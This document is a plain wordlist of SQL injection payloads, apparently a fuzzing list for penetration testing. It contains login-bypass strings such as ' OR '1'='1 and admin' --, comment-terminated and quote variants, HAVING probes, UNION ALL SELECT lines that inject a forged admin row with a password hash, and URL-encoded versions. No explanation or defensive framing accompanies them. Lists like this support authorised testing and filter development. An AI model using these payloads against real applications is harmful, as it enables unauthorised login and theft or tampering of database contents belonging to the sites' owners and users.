' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
" OR "1"="1
" OR "1"="1" --
" OR 1=1 --
" OR 1=1 #
') OR ('1'='1
') OR ('1'='1' --
') OR 1=1 --
admin' --
admin' #
admin'/*
admin' OR '1'='1
admin' OR '1'='1' --
admin' OR '1'='1' #
admin' OR 1=1 --
admin' OR 1=1 #
admin') OR ('1'='1' --
admin") OR ("1"="1" --
' OR ''='
' OR 'x'='x
' OR 'a'='a
' OR 1 --
' OR 1#
'='
''='
'LIKE'
1' OR '1'='1
1' OR 1=1 --
1' OR 1=1 #
1') OR ('1'='1
or 1=1
or 1=1 --
or 1=1#
or 1=1/*
' or ''-'
' or '' '
' or ''&'
' or ''-'
' or 1=1
" or 1=1
' or 1=1 --
" or 1=1 --
' or 1=1#
" or 1=1#
or true --
' or true --
" or true --
') or true --
admin'or 1=1 or ''='
-1' OR 1=1 --
-1" OR 1=1 --
-1' or 1 --
having 1=1 --
' HAVING 1=1 --
" HAVING 1=1 --
' AND 1=0 UNION ALL SELECT 'admin','81dc9bdb52d04dc20036dbd8313ed055
1' AND 1=0 UNION ALL SELECT 'admin','aad3b435b51404eeaad3b435b51404ee
'||(SELECT '')||'
'+(SELECT '')+' 
'%20or%20'1'%3D'1
'%20or%20''%3D'
'%20or%201%3D1--
'%20or%201%3D1%23
admin%27%20or%20%271%27%3D%271
